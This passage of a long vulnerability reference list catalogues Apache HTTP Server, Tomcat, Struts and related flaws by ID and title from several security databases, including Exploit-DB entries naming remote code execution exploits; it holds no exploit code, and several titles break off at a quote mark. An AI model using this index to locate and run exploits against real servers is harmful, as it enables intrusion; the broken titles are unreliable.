12214| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
12215| [39608] Apache HTTP Server balancer manager cross-site request forgery
12216| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
12217| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
12218| [39472] Apache HTTP Server mod_status cross-site scripting
12219| [39201] Apache Tomcat JULI logging weak security
12220| [39158] Apache HTTP Server Windows SMB shares information disclosure
12221| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
12222| [38951] Apache::AuthCAS Perl module cookie SQL injection
12223| [38800] Apache HTTP Server 413 error page cross-site scripting
12224| [38211] Apache Geronimo SQLLoginModule authentication bypass
12225| [37243] Apache Tomcat WebDAV directory traversal
12226| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
12227| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
12228| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
12229| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
12230| [36782] Apache Geronimo MEJB unauthorized access
12231| [36586] Apache HTTP Server UTF-7 cross-site scripting
12232| [36468] Apache Geronimo LoginModule security bypass
12233| [36467] Apache Tomcat functions.jsp cross-site scripting
12234| [36402] Apache Tomcat calendar cross-site request forgery
12235| [36354] Apache HTTP Server mod_proxy module denial of service
12236| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
12237| [36336] Apache Derby lock table privilege escalation
12238| [36335] Apache Derby schema privilege escalation
12239| [36006] Apache Tomcat "
12240| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
12241| [35999] Apache Tomcat \"
12242| [35795] Apache Tomcat CookieExample cross-site scripting
12243| [35536] Apache Tomcat SendMailServlet example cross-site scripting
12244| [35384] Apache HTTP Server mod_cache module denial of service
12245| [35097] Apache HTTP Server mod_status module cross-site scripting
12246| [35095] Apache HTTP Server Prefork MPM module denial of service
12247| [34984] Apache HTTP Server recall_headers information disclosure
12248| [34966] Apache HTTP Server MPM content spoofing
12249| [34965] Apache HTTP Server MPM information disclosure
12250| [34963] Apache HTTP Server MPM multiple denial of service
12251| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
12252| [34869] Apache Tomcat JSP example Web application cross-site scripting
12253| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
12254| [34496] Apache Tomcat JK Connector security bypass
12255| [34377] Apache Tomcat hello.jsp cross-site scripting
12256| [34212] Apache Tomcat SSL configuration security bypass
12257| [34210] Apache Tomcat Accept-Language cross-site scripting
12258| [34209] Apache Tomcat calendar application cross-site scripting
12259| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
12260| [34167] Apache Axis WSDL file path disclosure
12261| [34068] Apache Tomcat AJP connector information disclosure
12262| [33584] Apache HTTP Server suEXEC privilege escalation
12263| [32988] Apache Tomcat proxy module directory traversal
12264| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
12265| [32708] Debian Apache tty privilege escalation
12266| [32441] ApacheStats extract() PHP call unspecified
12267| [32128] Apache Tomcat default account
12268| [31680] Apache Tomcat RequestParamExample cross-site scripting
12269| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
12270| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
12271| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
12272| [30456] Apache mod_auth_kerb off-by-one buffer overflow
12273| [29550] Apache mod_tcl set_var() format string
12274| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
12275| [28357] Apache HTTP Server mod_alias script source information disclosure
12276| [28063] Apache mod_rewrite off-by-one buffer overflow
12277| [27902] Apache Tomcat URL information disclosure
12278| [26786] Apache James SMTP server denial of service
12279| [25680] libapache2 /tmp/svn file upload
12280| [25614] Apache Struts lookupMap cross-site scripting
12281| [25613] Apache Struts ActionForm denial of service
12282| [25612] Apache Struts isCancelled() security bypass
12283| [24965] Apache mod_python FileSession command execution
12284| [24716] Apache James spooler memory leak denial of service
12285| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
12286| [24158] Apache Geronimo jsp-examples cross-site scripting
12287| [24030] Apache auth_ldap module multiple format strings
12288| [24008] Apache mod_ssl custom error message denial of service
12289| [24003] Apache mod_auth_pgsql module multiple syslog format strings
12290| [23612] Apache mod_imap referer field cross-site scripting
12291| [23173] Apache Struts error message cross-site scripting
12292| [22942] Apache Tomcat directory listing denial of service
12293| [22858] Apache Multi-Processing Module code allows denial of service
12294| [22602] RHSA-2005:582 updates for Apache httpd not installed
12295| [22520] Apache mod-auth-shadow "
12296| [22466] ApacheTop symlink
12297| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
12298| [22006] Apache HTTP Server byte-range filter denial of service
12299| [21567] Apache mod_ssl off-by-one buffer overflow
12300| [21195] Apache HTTP Server header HTTP request smuggling
12301| [20383] Apache HTTP Server htdigest buffer overflow
12302| [19681] Apache Tomcat AJP12 request denial of service
12303| [18993] Apache HTTP server check_forensic symlink attack
12304| [18790] Apache Tomcat Manager cross-site scripting
12305| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
12306| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
12307| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
12308| [17961] Apache Web server ServerTokens has not been set
12309| [17930] Apache HTTP Server HTTP GET request denial of service
12310| [17785] Apache mod_include module buffer overflow
12311| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
12312| [17473] Apache HTTP Server Satisfy directive allows access to resources
12313| [17413] Apache htpasswd buffer overflow
12314| [17384] Apache HTTP Server environment variable configuration file buffer overflow
12315| [17382] Apache HTTP Server IPv6 apr_util denial of service
12316| [17366] Apache HTTP Server mod_dav module LOCK denial of service
12317| [17273] Apache HTTP Server speculative mode denial of service
12318| [17200] Apache HTTP Server mod_ssl denial of service
12319| [16890] Apache HTTP Server server-info request has been detected
12320| [16889] Apache HTTP Server server-status request has been detected
12321| [16705] Apache mod_ssl format string attack
12322| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
12323| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
12324| [16230] Apache HTTP Server PHP denial of service
12325| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
12326| [15958] Apache HTTP Server authentication modules memory corruption
12327| [15547] Apache HTTP Server mod_disk_cache local information disclosure
12328| [15540] Apache HTTP Server socket starvation denial of service
12329| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
12330| [15422] Apache HTTP Server mod_access information disclosure
12331| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
12332| [15293] Apache for Cygwin "
12333| [15065] Apache-SSL has a default password
12334| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
12335| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
12336| [14751] Apache Mod_python output filter information disclosure
12337| [14125] Apache HTTP Server mod_userdir module information disclosure
12338| [14075] Apache HTTP Server mod_php file descriptor leak
12339| [13703] Apache HTTP Server account
12340| [13689] Apache HTTP Server configuration allows symlinks
12341| [13688] Apache HTTP Server configuration allows SSI
12342| [13687] Apache HTTP Server Server: header value
12343| [13685] Apache HTTP Server ServerTokens value
12344| [13684] Apache HTTP Server ServerSignature value
12345| [13672] Apache HTTP Server config allows directory autoindexing
12346| [13671] Apache HTTP Server default content
12347| [13670] Apache HTTP Server config file directive references outside content root
12348| [13668] Apache HTTP Server httpd not running in chroot environment
12349| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
12350| [13664] Apache HTTP Server config file contains ScriptAlias entry
12351| [13663] Apache HTTP Server CGI support modules loaded
12352| [13661] Apache HTTP Server config file contains AddHandler entry
12353| [13660] Apache HTTP Server 500 error page not CGI script
12354| [13659] Apache HTTP Server 413 error page not CGI script
12355| [13658] Apache HTTP Server 403 error page not CGI script
12356| [13657] Apache HTTP Server 401 error page not CGI script
12357| [13552] Apache HTTP Server mod_cgid module information disclosure
12358| [13550] Apache GET request directory traversal
12359| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
12360| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
12361| [13429] Apache Tomcat non-HTTP request denial of service
12362| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
12363| [13295] Apache weak password encryption
12364| [13254] Apache Tomcat .jsp cross-site scripting
12365| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
12366| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
12367| [12681] Apache HTTP Server mod_proxy could allow mail relaying
12368| [12662] Apache HTTP Server rotatelogs denial of service
12369| [12554] Apache Tomcat stores password in plain text
12370| [12553] Apache HTTP Server redirects and subrequests denial of service
12371| [12552] Apache HTTP Server FTP proxy server denial of service
12372| [12551] Apache HTTP Server prefork MPM denial of service
12373| [12550] Apache HTTP Server weaker than expected encryption
12374| [12549] Apache HTTP Server type-map file denial of service
12375| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
12376| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
12377| [12091] Apache HTTP Server apr_password_validate denial of service
12378| [12090] Apache HTTP Server apr_psprintf code execution
12379| [11804] Apache HTTP Server mod_access_referer denial of service
12380| [11750] Apache HTTP Server could leak sensitive file descriptors
12381| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
12382| [11703] Apache long slash path allows directory listing
12383| [11695] Apache HTTP Server LF (Line Feed) denial of service
12384| [11694] Apache HTTP Server filestat.c denial of service
12385| [11438] Apache HTTP Server MIME message boundaries information disclosure
12386| [11412] Apache HTTP Server error log terminal escape sequence injection
12387| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
12388| [11195] Apache Tomcat web.xml could be used to read files
12389| [11194] Apache Tomcat URL appended with a null character could list directories
12390| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
12391| [11126] Apache HTTP Server illegal character file disclosure
12392| [11125] Apache HTTP Server DOS device name HTTP POST code execution
12393| [11124] Apache HTTP Server DOS device name denial of service
12394| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
12395| [10938] Apache HTTP Server printenv test CGI cross-site scripting
12396| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
12397| [10575] Apache mod_php module could allow an attacker to take over the httpd process
12398| [10499] Apache HTTP Server WebDAV HTTP POST view source
12399| [10457] Apache HTTP Server mod_ssl "
12400| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
12401| [10414] Apache HTTP Server htdigest multiple buffer overflows
12402| [10413] Apache HTTP Server htdigest temporary file race condition
12403| [10412] Apache HTTP Server htpasswd temporary file race condition
12404| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
12405| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
12406| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
12407| [10280] Apache HTTP Server shared memory scorecard overwrite
12408| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
12409| [10241] Apache HTTP Server Host: header cross-site scripting
12410| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
12411| [10208] Apache HTTP Server mod_dav denial of service
12412| [10206] HP VVOS Apache mod_ssl denial of service
12413| [10200] Apache HTTP Server stderr denial of service
12414| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
12415| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
12416| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
12417| [10098] Slapper worm targets OpenSSL/Apache systems
12418| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
12419| [9875] Apache HTTP Server .var file request could disclose installation path
12420| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
12421| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
12422| [9623] Apache HTTP Server ap_log_rerror() path disclosure
12423| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
12424| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
12425| [9396] Apache Tomcat null character to threads denial of service
12426| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
12427| [9249] Apache HTTP Server chunked encoding heap buffer overflow
12428| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
12429| [8932] Apache Tomcat example class information disclosure
12430| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
12431| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
12432| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
12433| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
12434| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
12435| [8400] Apache HTTP Server mod_frontpage buffer overflows
12436| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
12437| [8308] Apache "
12438| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
12439| [8119] Apache and PHP OPTIONS request reveals "
12440| [8054] Apache is running on the system
12441| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
12442| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
12443| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
12444| [7836] Apache HTTP Server log directory denial of service
12445| [7815] Apache for Windows "
12446| [7810] Apache HTTP request could result in unexpected behavior
12447| [7599] Apache Tomcat reveals installation path
12448| [7494] Apache "
12449| [7419] Apache Web Server could allow remote attackers to overwrite .log files
12450| [7363] Apache Web Server hidden HTTP requests
12451| [7249] Apache mod_proxy denial of service
12452| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
12453| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
12454| [7059] Apache "
12455| [7057] Apache "
12456| [7056] Apache "
12457| [7055] Apache "
12458| [7054] Apache "
12459| [6997] Apache Jakarta Tomcat error message may reveal information
12460| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
12461| [6970] Apache crafted HTTP request could reveal the internal IP address
12462| [6921] Apache long slash path allows directory listing
12463| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
12464| [6527] Apache Web Server for Windows and OS2 denial of service
12465| [6316] Apache Jakarta Tomcat may reveal JSP source code
12466| [6305] Apache Jakarta Tomcat directory traversal
12467| [5926] Linux Apache symbolic link
12468| [5659] Apache Web server discloses files when used with php script
12469| [5310] Apache mod_rewrite allows attacker to view arbitrary files
12470| [5204] Apache WebDAV directory listings
12471| [5197] Apache Web server reveals CGI script source code
12472| [5160] Apache Jakarta Tomcat default installation
12473| [5099] Trustix Secure Linux installs Apache with world writable access
12474| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
12475| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
12476| [4931] Apache source.asp example file allows users to write to files
12477| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
12478| [4205] Apache Jakarta Tomcat delivers file contents
12479| [2084] Apache on Debian by default serves the /usr/doc directory
12480| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
12481| [697] Apache HTTP server beck exploit
12482| [331] Apache cookies buffer overflow
12483|
12484| Exploit-DB - https://www.exploit-db.com:
12485| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
12486| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
12487| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
12488| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
12489| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
12490| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
12491| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
12492| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
12493| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
12494| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
12495| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
12496| [29859] Apache Roller OGNL Injection
12497| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
12498| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
12499| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
12500| [29290] Apache / PHP 5.x Remote Code Execution Exploit
12501| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
12502| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
12503| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
12504| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
12505| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
12506| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
12507| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
12508| [27096] Apache Geronimo 1.0 Error Page XSS
12509| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
12510| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
12511| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
12512| [25986] Plesk Apache Zeroday Remote Exploit
12513| [25980] Apache Struts includeParams Remote Code Execution
12514| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
12515| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
12516| [24874] Apache Struts ParametersInterceptor Remote Code Execution
12517| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
12518| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
12519| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
12520| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
12521| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
12522| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
12523| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
12524| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
12525| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
12526| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
12527| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
12528| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
12529| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
12530| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
12531| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
12532| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
12533| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
12534| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
12535| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
12536| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
12537| [21719] Apache 2.0 Path Disclosure Vulnerability
12538| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
12539| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
12540| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
12541| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
12542| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
12543| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
12544| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
12545| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
12546| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
12547| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
12548| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
12549| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
12550| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
12551| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
12552| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
12553| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
12554| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
12555| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
12556| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
12557| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
12558| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
12559| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
12560| [20558] Apache 1.2 Web Server DoS Vulnerability
12561| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
12562| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
12563| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
12564| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
12565| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
12566| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
12567| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
12568| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
12569| [19231] PHP apache_request_headers Function Buffer Overflow
12570| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
12571| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
12572| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
12573| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
12574| [18442] Apache httpOnly Cookie Disclosure
12575| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
12576| [18221] Apache HTTP Server Denial of Service
12577| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
12578| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
12579| [17691] Apache Struts < 2.2.0 - Remote Command Execution
12580| [16798] Apache mod_jk 1.2.20 Buffer Overflow
12581| [16782] Apache Win32 Chunked Encoding
12582| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
12583| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
12584| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
12585| [15319] Apache 2.2 (Windows) Local Denial of Service
12586| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
12587| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
12588| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
12589| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
12590| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
12591| [12330] Apache OFBiz - Multiple XSS
12592| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
12593| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
12594| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
12595| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
12596| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
12597| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
12598| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
12599| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
12600| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
12601| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
12602| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
12603| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
12604| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
12605| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
12606| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
12607| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
12608| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
12609| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
12610| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
12611| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
12612| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
12613| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
12614| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
12615| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
12616| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
12617| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
12618| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
12619| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
12620| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
12621| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
12622| [466] htpasswd Apache 1.3.31 - Local Exploit
12623| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
12624| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
12625| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
12626| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
12627| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
12628| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
12629| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
12630| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
12631| [9] Apache HTTP Server 2.x Memory Leak Exploit
12632|
12633| OpenVAS (Nessus) - http://www.openvas.org:
12634| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
12635| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
12636| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
12637| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
12638| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
12639| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
12640| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
12641| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
12642| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
12643| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
12644| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
12645| [900571] Apache APR-Utils Version Detection
12646| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
12647| [900496] Apache Tiles Multiple XSS Vulnerability
12648| [900493] Apache Tiles Version Detection
12649| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
12650| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
12651| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
12652| [870175] RedHat Update for apache RHSA-2008:0004-01
12653| [864591] Fedora Update for apache-poi FEDORA-2012-10835
12654| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
12655| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
12656| [864250] Fedora Update for apache-poi FEDORA-2012-7683
12657| [864249] Fedora Update for apache-poi FEDORA-2012-7686
12658| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
12659| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
12660| [855821] Solaris Update for Apache 1.3 122912-19
12661| [855812] Solaris Update for Apache 1.3 122911-19
12662| [855737] Solaris Update for Apache 1.3 122911-17
12663| [855731] Solaris Update for Apache 1.3 122912-17
12664| [855695] Solaris Update for Apache 1.3 122911-16
12665| [855645] Solaris Update for Apache 1.3 122912-16
12666| [855587] Solaris Update for kernel update and Apache 108529-29
12667| [855566] Solaris Update for Apache 116973-07
12668| [855531] Solaris Update for Apache 116974-07
12669| [855524] Solaris Update for Apache 2 120544-14
12670| [855494] Solaris Update for Apache 1.3 122911-15
12671| [855478] Solaris Update for Apache Security 114145-11
12672| [855472] Solaris Update for Apache Security 113146-12
12673| [855179] Solaris Update for Apache 1.3 122912-15
12674| [855147] Solaris Update for kernel update and Apache 108528-29
12675| [855077] Solaris Update for Apache 2 120543-14
